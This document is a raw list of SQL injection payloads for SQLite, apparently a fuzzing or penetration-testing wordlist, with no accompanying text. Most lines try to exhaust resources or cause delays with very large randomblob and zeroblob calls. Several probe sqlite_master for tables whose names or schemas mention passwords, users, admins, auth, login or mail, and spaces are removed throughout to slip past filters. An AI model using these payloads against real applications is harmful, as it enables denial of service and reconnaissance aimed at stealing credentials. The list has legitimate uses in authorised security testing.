'OR(SELECTabs(random())FROMsqlite_masterLIMIT1OFFSET0)-- 
'OR1=1AND(SELECTabs(random())FROMsqlite_masterLIMIT1OFFSET0)-- 
'||(SELECTabs(random())FROMsqlite_masterLIMIT1OFFSET0)-- 
'OR(SELECTlength(randomblob(100000000)))-- 
'OR1=1AND(SELECTlength(randomblob(100000000)))-- 
'||(SELECTlength(randomblob(100000000)))--
'OR(SELECTzeroblob(100000000))--
'OR1=1AND(SELECTzeroblob(100000000))--
'||(SELECTzeroblob(100000000))--
'OR(SELECThex(randomblob(100000000)))--
'OR1=1AND(SELECThex(randomblob(100000000)))--
'||(SELECThex(randomblob(100000000)))--
'OR(SELECTrandom()FROMsqlite_masterLIMIT1OFFSET0)--
'OR1=1AND(SELECTrandom()FROMsqlite_masterLIMIT1OFFSET0)--
'||(SELECTrandom()FROMsqlite_masterLIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='index'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='view'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREnameLIKE'user%'LIMIT1OFFSET0)--
'OR(SELECTrandomblob(100000000)FROMsqlite_masterLIMIT1)--
'||(SELECTrandomblob(100000000)FROMsqlite_masterLIMIT1)--
'AND(SELECTabs(random())FROMsqlite_masterLIMIT1OFFSET0)--
'AND(SELECTlength(randomblob(100000000)))--
'AND(SELECThex(randomblob(100000000)))--
'AND(SELECTrandom()FROMsqlite_masterLIMIT1OFFSET0)--
'AND(SELECTrandomblob(100000000)FROMsqlite_masterLIMIT1)--
'||(SELECTlength(zeroblob(100000000)))--
'||(SELECThex(zeroblob(100000000)))--
'OR(SELECTCASEWHEN(1=1)THENlength(randomblob(100000000))END)--
'OR(SELECTCASEWHEN(SELECTsqlite_version())LIKE'3%'THENrandomblob(1000000000)END)--
'OR(SELECTCOUNT(*)FROMsqlite_masterWHERERANDOMBLOB(1000000000))--
'OR1=1AND(SELECTCOUNT(*)FROMsqlite_masterWHERERANDOMBLOB(1000000000))--
'OR(SELECTRANDOMBLOB(1000000000))--
'||(SELECTRANDOMBLOB(1000000000))--
'AND(SELECTRANDOMBLOB(1000000000))--
'||(SELECTRANDOMBLOB(1000000000)FROMsqlite_masterLIMIT1)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'user%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%admin%'LIMIT1OFFSET0)--
'OR1=1AND(SELECTrandom()FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%user%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='view'ANDnameLIKE'%log%'LIMIT1OFFSET0)--
'OR1=1AND(SELECTlength(randomblob(100000000)))--
'OR1=1AND(SELECThex(randomblob(100000000)))--
'OR(SELECTlength(RANDOMBLOB(100000000)))--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%password%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%mail%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%user%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%auth%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%admin%'LIMIT1OFFSET0)--
'OR(SELECTlength(randomblob(99999999)))--
'OR(SELECTlength(zeroblob(99999999)))--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%a%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%e%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%i%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%o%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%u%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterLIMIT1OFFSET0)--
'AND(SELECTlength(randomblob(99999999)))--
'AND(SELECTrandom()FROMsqlite_masterLIMIT1OFFSET0)--
'AND(SELECTrandomblob(99999999)FROMsqlite_masterLIMIT1)--
'OR(SELECTlength(randomblob(99999999)))--
'||(SELECTlength(randomblob(99999999)))--
'OR(SELECTlength(hex(randomblob(99999999))))--
'AND(SELECTlength(hex(randomblob(99999999))))--
'OR(SELECThex(randomblob(99999999)))--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%login%'LIMIT1OFFSET0)--
'||(SELECThex(randomblob(100000000)))--
'||(SELECThex(randomblob(99999999)))--
'AND(SELECThex(randomblob(99999999)))--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%auth%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%mail%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%user%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%admin%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterLIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%auth%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%mail%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%user%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDnameLIKE'%admin%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%password%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%login%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%login%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%login%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%user%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%user%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%user%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%admin%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%admin%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%admin%'LIMIT1OFFSET0)--
'OR(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%auth%'LIMIT1OFFSET0)--
'AND(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%auth%'LIMIT1OFFSET0)--
'||(SELECTabs(random())FROMsqlite_masterWHEREtype='table'ANDsqlLIKE'%auth%'LIMIT1OFFSET0)--